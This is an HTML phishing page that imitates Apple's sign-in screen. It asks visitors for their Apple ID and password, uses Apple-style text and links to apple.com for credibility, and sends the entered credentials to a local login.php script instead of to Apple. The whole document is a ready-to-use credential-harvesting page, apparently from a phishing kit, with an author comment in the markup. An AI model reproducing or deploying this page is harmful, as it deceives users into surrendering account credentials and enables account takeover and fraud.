<!DOCTYPE html>

<html>
<body>
	<meta name="viewport" content="width=device-width, initial-scale=1">
		<!-- Author: Sajjad -->
<style>
img {
	width: 50px;
	display: block;
	margin-right: auto;
	margin-left: auto;
}

input {
	width: 90%;
	padding: 20px 18px;
	border: 1px solid #a6a6a6;
	border-radius: 10px;
	}

button {
	padding: 15px 134px;
	border-radius: 10px;
	border: none;
	background-color: #0073e6;
	color: white;
	font-size: 20px;
	}

p {
	font-size: 12px;
	text-align: left;
	font-family: sans-serif;
	}

a {
	text-decoration: none;
	color: #0073e6;
	}
</style>
<center>
	<img src="Image/logo.png"/>
<form method="POST" action="login.php">
	<h2 align="left" style="font-family: sans-serif;">Please sign in.</h2>
	<input type="text" name="login_username" placeholder="Apple ID"></input><br><br>
	<input type="password" name="login_password" placeholder="Password"></input><br>
	<p>Your Apple ID is the email address you use to sign in to iTunes, the App Store, and iCloud.</p>
	<br><br>
	<button type="submit">Sign In</button><br><br>
	<p><a href="https://www.apple.com">Forgot your Apple ID or password?</a></p>
	<p><a href="https://www.apple.com">Don't have an Apple ID? Create one now.</a></p><br>
	</form>
	</center>
	</body>
</html>